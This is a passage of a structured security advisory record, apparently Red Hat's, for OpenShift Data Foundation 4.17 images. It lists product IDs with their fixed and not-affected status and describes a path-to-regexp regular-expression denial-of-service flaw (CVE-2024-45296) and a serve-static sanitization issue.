"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", 